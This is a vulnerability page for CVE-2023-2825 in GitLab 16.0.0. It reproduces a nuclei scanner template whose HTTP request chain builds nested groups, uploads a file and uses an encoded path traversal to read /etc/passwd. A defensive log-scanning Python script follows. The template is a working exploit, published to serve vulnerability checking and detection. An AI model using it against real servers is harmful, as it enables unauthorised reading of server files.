GitLab 16.0.0 - Path Traversal

Published: 2023-05-29 08:36:11
Source: ProjectDiscovery (github.com)
Tags: gitlab, cve2023, path traversal, unauthenticated, public project

CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
(The vector string shown evaluates to 9.3 under the CVSS v3.1 formula, not 10; the template's own classification block below carries the NVD vector, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, which scores 7.5.)

AI Score: 8.3 High (Confidence: High)
EPSS: 0.159 Low (Percentile: 96.0%)

An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.12203
    epss-percentile: 0.95384
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
variables:
  data: "{{rand_base(5)}}"  # random slug reused for the eleven nested group names and paths

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme%5D=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78  # "root:x", the first bytes of /etc/passwd, hex-encoded
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a00473045022100dfd3431d04aa76f4f656e43eb506273387a8299167937a29af634da664383762022043221d39d47a5c3aff4ea35ebd7ca48af5ba36ec2866494452f9b42702206196:922c64590222798bb761d5b6d8e72950
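The template above builds the precondition itself (eleven nested groups, a public project and one attachment) and then requests that attachment with twelve encoded `../` segments appended to the upload's secret directory. On the defensive side the same shape is easy to pick out of access logs. What follows is an added detection example, not part of the nuclei template or of GitLab's or ProjectDiscovery's code: it parses nginx combined-format lines (an assumed format), percent-decodes the filename component of GitLab upload URLs in two rounds (so double-encoded `%252F` is caught as well), normalises it under the upload's 32-hex secret directory, and flags any request that climbs out of that directory, recording whether the namespace depth meets the advisory's at-least-five-groups precondition. The sample log lines, the secret value and every helper name are constructed for the illustration.

```python
"""Spot CVE-2023-2825-style traversal requests in GitLab access logs.

Added example, not code from the nuclei template, ProjectDiscovery or GitLab.
The log format (nginx combined), the sample lines and all helper names are
assumptions for illustration; adapt LOG_RE to your own access-log format.
"""
import posixpath
import re
from urllib.parse import unquote

# Method, URL path and status from an nginx combined-format line (assumed format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# GitLab attachment URL: /<group>/.../<project>/uploads/<32-hex secret>/<filename>
# The filename is matched on the raw (still percent-encoded) URL, so it holds no '/'.
UPLOAD_RE = re.compile(
    r'^/(?P<namespace>(?:[^/]+/)+)uploads/(?P<secret>[0-9a-f]{32})/(?P<name>[^/]+)$'
)

MIN_GROUP_DEPTH = 5  # advisory precondition: project nested in at least five groups


def decode_rounds(value, rounds=2):
    """Percent-decode up to `rounds` times so %2F and double-encoded %252F both become '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_upload_request(path):
    """Describe an uploads request, or return None if `path` is not one.

    The filename component is decoded and normalised under the secret directory;
    if the result no longer sits inside that directory the request is a traversal.
    """
    path = path.split('?', 1)[0]
    m = UPLOAD_RE.match(path)
    if m is None:
        return None
    segments = m.group('namespace').strip('/').split('/')
    group_depth = len(segments) - 1  # last segment is the project, the rest are groups
    base = '/' + m.group('secret')
    resolved = posixpath.normpath(posixpath.join(base, decode_rounds(m.group('name'))))
    escapes = not resolved.startswith(base + '/')
    return {
        'project': segments[-1],
        'group_depth': group_depth,
        'meets_precondition': group_depth >= MIN_GROUP_DEPTH,
        'escapes': escapes,
        'resolved': resolved if escapes else None,
    }


def scan_log(lines):
    """Return one finding per log line whose uploads request escapes its secret directory."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if m is None:
            continue
        info = analyse_upload_request(m.group('path'))
        if info and info['escapes']:
            info['status'] = int(m.group('status'))
            findings.append(info)
    return findings


# Constructed values (not a real upload secret, not real log data).
SECRET = '1f2e3d4c5b6a79881234567890abcdef'
GROUPS = '/'.join(f'g{i}' for i in range(1, 12))  # eleven nested groups, as the template builds
TEMPLATE_PATH = f'/{GROUPS}/CVE-2023-2825/uploads/{SECRET}/' + '..%2F' * 12 + 'etc%2Fpasswd'

SAMPLE_LOG = f"""\
203.0.113.7 - - [29/May/2023:08:36:11 +0000] "GET /acme/docs/uploads/{SECRET}/diagram.png HTTP/1.1" 200 5120 "-" "curl/8.1.2"
203.0.113.7 - - [29/May/2023:08:36:12 +0000] "GET {TEMPLATE_PATH} HTTP/1.1" 200 1844 "-" "curl/8.1.2"
203.0.113.7 - - [29/May/2023:08:36:13 +0000] "GET /acme/docs/uploads/{SECRET}/..%252F..%252Fetc%252Fhostname HTTP/1.1" 404 0 "-" "curl/8.1.2"
203.0.113.7 - - [29/May/2023:08:36:14 +0000] "GET /users/sign_in HTTP/1.1" 200 9102 "-" "curl/8.1.2"
"""

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG.splitlines()):
        flag = 'precondition met' if f['meets_precondition'] else 'namespace too shallow for CVE-2023-2825'
        print(f"HTTP {f['status']} traversal to {f['resolved']} via project {f['project']} ({flag})")
```

Run stand-alone it reports the two traversal hits from the constructed log. The second one escapes its secret directory but sits under a single group, which by the advisory cannot trigger this CVE, so it is kept as a finding with the depth caveat rather than dropped: the same request shape is worth an alert regardless of which bug it was aimed at. The decoding happens in the script because nginx records the URL as received, still percent-encoded.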
